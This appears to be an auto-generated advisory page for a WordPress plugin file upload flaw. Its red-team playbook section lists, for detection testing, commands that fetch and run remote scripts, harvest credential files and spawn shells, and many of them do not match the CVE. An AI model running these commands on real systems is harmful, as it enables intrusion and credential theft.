CVE-2026-58480
Overview
This vulnerability is an unauthenticated arbitrary file upload flaw stemming from improper input validation in the Blocksy Companion Pro WordPress plugin prior to version 2.1.47. The root cause is a flawed substring check using strpos() in the Custom Fonts extension, which incorrectly validates file extensions by allowing double-extension filenames to bypass the extension filter. The affected component is the save_attachments function exposed via the Advanced Reviews feature, which processes uploaded files without adequate sanitization.
Vulnerability Description
Blocksy Companion Pro plugin for WordPress before 2.1.47 contains an unauthenticated arbitrary file upload vulnerability that allows attackers to upload executable files by bypassing extension validation in the save_attachments function exposed through the Advanced Reviews feature. Attackers can exploit the Custom Fonts extension's flawed strpos() substring check by uploading double-extension filenames such as shell.woff2.php, causing the validation to pass on the substring match while the web server executes the file as PHP, achieving remote code execution.
Impact
An unauthenticated attacker can upload malicious PHP files to the server and execute arbitrary code remotely, resulting in full system compromise. No authentication or user interaction is required to exploit this flaw. This can lead to unauthorized access to sensitive data, server takeover, lateral movement within the network, and potential disruption of services hosted on the affected WordPress site.
Solution
To remediate this vulnerability, upgrade the Blocksy Companion Pro plugin to version 2.1.47 or later as provided on the official WordPress plugin repository (https://wordpress.org/plugins/blocksy-companion/). The update corrects the file extension validation logic in the save_attachments function. Detailed patch instructions and advisories are available through the vendor's official plugin page and security advisories from Wordfence and Patchstack.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Blocksy Companion Pro plugin for WordPress presents a significant risk due to its unauthenticated arbitrary file upload capability. This flaw arises from a failure in the validation process within the save_attachments function, specifically when handling file uploads through the Advanced Reviews feature. The vulnerability allows attackers to bypass extension checks by exploiting a flawed substring check in the Custom Fonts extension. By uploading files with double extensions, such as shell.woff2.php, attackers can manipulate the validation mechanism, leading to the execution of arbitrary code on the server. This occurs because the web server, upon receiving such a file, processes it as a PHP script, thereby granting the attacker remote code execution capabilities.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a malicious request to upload a file containing a double extension, successfully bypassing the plugin's security checks. Once the file is uploaded, the attacker can execute arbitrary commands on the server, potentially leading to a full compromise of the affected WordPress site. This scenario could unfold in a variety of environments, from small personal blogs to large enterprise websites, making it a versatile threat. Additionally, the lack of authentication requirements for file uploads means that even unauthenticated users can exploit this vulnerability, significantly lowering the barrier to entry for potential attackers.
The real-world impact of this vulnerability is profound, especially considering the high CVSS score of 9.8, which indicates critical severity. Successful exploitation could lead to unauthorized access to sensitive data, defacement of websites, or even the deployment of malware. For businesses, this translates to potential financial losses, reputational damage, and legal ramifications, particularly if customer data is compromised. Furthermore, the presence of such a vulnerability can erode customer trust, which is essential for maintaining a competitive edge in the digital marketplace. Organizations that rely on the Blocksy Companion Pro plugin must recognize the urgency of addressing this vulnerability to safeguard their assets and maintain operational integrity.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating the Blocksy Companion Pro plugin to the latest version is crucial, as developers often release patches to address known vulnerabilities. Additionally, employing a web application firewall (WAF) can help filter out malicious requests and provide an additional layer of security against file upload attacks. Security monitoring tools should be utilized to detect unusual file uploads or changes to the server environment, enabling rapid response to potential exploitation attempts. Furthermore, conducting regular security audits and penetration testing can help identify and remediate vulnerabilities before they can be exploited by attackers.
In conclusion, the unauthenticated arbitrary file upload vulnerability in the Blocksy Companion Pro plugin poses a critical threat to WordPress sites. Its exploitation can lead to severe consequences, including remote code execution and unauthorized access to sensitive information. Organizations must prioritize detection and mitigation strategies to protect their digital assets from this and similar vulnerabilities. By staying informed about security best practices and maintaining a proactive security posture, businesses can significantly reduce their risk exposure and enhance their overall cybersecurity resilience.
Affected Products
No CPE information available.
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
Active exploitation confirmed — vendor: Creative Themes, product: Blocksy Companion
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-58480 |
| wordfence.com |
GitHub CVE
third-party-advisory
|
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/blocksy-companion/blocksy-companion-2146-unauthenticated-arbitrary-file-upload-via-blc-review-images-parameter |
| patchstack.com |
GitHub CVE
third-party-advisory
|
https://patchstack.com/database/wordpress/plugin/blocksy-companion/vulnerability/wordpress-blocksy-companion-plugin-2-1-46-unauthenticated-arbitrary-file-upload-vulnerability |
| wordpress.org |
GitHub CVE
product
patch
|
https://wordpress.org/plugins/blocksy-companion/ |
| vulncheck.com |
GitHub CVE
third-party-advisory
|
https://www.vulncheck.com/advisories/blocksy-companion-pro-unauthenticated-file-upload-via-save-attachments |